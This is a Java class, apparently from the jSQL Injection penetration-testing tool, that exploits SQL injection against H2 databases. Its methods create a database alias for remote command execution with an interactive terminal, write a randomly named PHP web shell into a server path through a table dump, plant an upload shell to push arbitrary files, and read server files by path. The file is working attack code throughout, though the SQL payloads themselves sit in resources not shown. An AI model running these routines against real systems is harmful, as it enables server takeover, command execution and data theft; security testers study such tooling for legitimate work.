package com.jsql.model.accessible.engine;
   
   import com.jsql.model.InjectionModel;
   import com.jsql.model.accessible.DataAccess;
   import com.jsql.model.accessible.ResourceAccess;
   import com.jsql.model.accessible.engine.h2.ModelYamlH2;
   import com.jsql.model.bean.database.MockElement;
   import com.jsql.view.subscriber.Seal;
   import com.jsql.model.exception.AbstractSlidingException;
  import com.jsql.model.exception.JSqlException;
  import com.jsql.model.exception.JSqlRuntimeException;
  import com.jsql.model.suspendable.SuspendableGetRows;
  import com.jsql.util.LogLevelUtil;
  import com.jsql.util.StringUtil;
  import org.apache.commons.lang3.RandomStringUtils;
  import org.apache.commons.lang3.StringUtils;
  import org.apache.logging.log4j.LogManager;
  import org.apache.logging.log4j.Logger;
  import org.yaml.snakeyaml.Yaml;
  
  import java.io.File;
  import java.io.FileInputStream;
  import java.io.IOException;
  import java.io.InputStream;
  import java.net.http.HttpResponse;
  import java.util.UUID;
  import java.util.function.BinaryOperator;
  
  public class ExploitH2 {
  
      private static final Logger LOGGER = LogManager.getRootLogger();
      private final InjectionModel injectionModel;
      private final ModelYamlH2 modelYaml;
  
      public ExploitH2(InjectionModel injectionModel) {
          this.injectionModel = injectionModel;
          var yaml = new Yaml();
          this.modelYaml = yaml.loadAs(
              injectionModel.getMediatorEngine().getH2().instance().getModelYaml().getResource().getExploit(),
              ModelYamlH2.class
          );
      }
  
      public void createUdf() throws JSqlException {
          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "UDF target requirements: stack query");
  
          this.injectionModel.injectWithoutIndex(this.modelYaml.getRce().getDropAlias(), "alias#drop");
          this.injectionModel.injectWithoutIndex(this.modelYaml.getRce().getCreateAlias(), "alias#create");
          var result = this.injectionModel.getResourceAccess().getResult(String.format(
              this.modelYaml.getRce().getRunCmd(),
              ResourceAccess.WEB_CONFIRM_CMD +"%20"
          ), ResourceAccess.RUN_FUNC);
          if (result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
              LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE UDF successful: command execution found");
              this.injectionModel.sendToViews(new Seal.AddTabExploitUdf(
                  (String command, UUID terminalID) -> this.injectionModel.getResourceAccess().getExploitH2().runRce(command, terminalID)
              ));
          }
      }
  
      public String runRce(String command, UUID uuidShell) {
          String result;
          try {
              result = this.injectionModel.getResourceAccess().getResult(String.format(
                  this.modelYaml.getRce().getRunCmd(),
                  command.replace(StringUtils.SPACE, "%20")
              ), ResourceAccess.RUN_FUNC);
          } catch (JSqlException e) {
              result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
          }
          this.injectionModel.sendToViews(new Seal.GetTerminalResult(
              uuidShell,
              result.trim() +"\n"  // missing newline on some extensions
          ));
          return result;
      }
  
      public String createWeb(String pathExploit, String urlExploit) {
          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
  
          String bodyExploit = StringUtil.base64Decode(
                  this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
              )
              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
  
          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
          this.injectionModel.injectWithoutIndex(String.format(
              this.modelYaml.getRce().getCreateTable(),
              nameTable,
              nameTable, bodyExploit.replace("'", "\"")
          ), ResourceAccess.TBL_CREATE);
          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
          this.injectionModel.injectWithoutIndex(String.format(
              this.modelYaml.getRce().getScriptSimple(),
              pathExploit + nameExploit,
              nameTable
          ), ResourceAccess.TBL_DUMP);
  
         BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
             String result = this.injectionModel.getResourceAccess().callCommand(
                 urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
             );
             if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
                 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
                 return StringUtils.EMPTY;
             }
             this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
             return urlSuccess;
         };
 
         return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
     }
 
     public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
         String bodyExploit = StringUtil.base64Decode(
                 this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
             )
             .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
             .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
 
         var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
         this.injectionModel.injectWithoutIndex(String.format(
             this.modelYaml.getRce().getCreateTable(),
             nameTable,
             nameTable, bodyExploit.replace("'", "\"")
         ), ResourceAccess.TBL_CREATE);
         var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
         this.injectionModel.injectWithoutIndex(String.format(
             this.modelYaml.getRce().getScriptSimple(),
             pathExploit + nameExploit,
             nameTable
         ), ResourceAccess.TBL_DUMP);
 
         BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
             try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
                 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
                 if (result.body().contains(DataAccess.LEAD +"y")) {
                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
                 } else {
                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
                 }
             } catch (InterruptedException e) {
                 LOGGER.log(LogLevelUtil.IGNORE, e, e);
                 Thread.currentThread().interrupt();
             } catch (IOException | JSqlException e) {
                 throw new JSqlRuntimeException(e);
             }
             return urlSuccess;
         };
 
         this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
     }
 
     public String getRead(String pathFile) throws AbstractSlidingException {
         return new SuspendableGetRows(this.injectionModel).run(
                 String.format(
                 this.injectionModel.getResourceAccess().getExploitH2().getModelYaml().getFile().getReadFromPath(),
                 pathFile
             ),
             new String[]{ StringUtils.EMPTY },
             false,
             1,
             MockElement.MOCK,
             ResourceAccess.FILE_READ
         );
     }
 
     public ModelYamlH2 getModelYaml() {
         return this.modelYaml;
     }
 }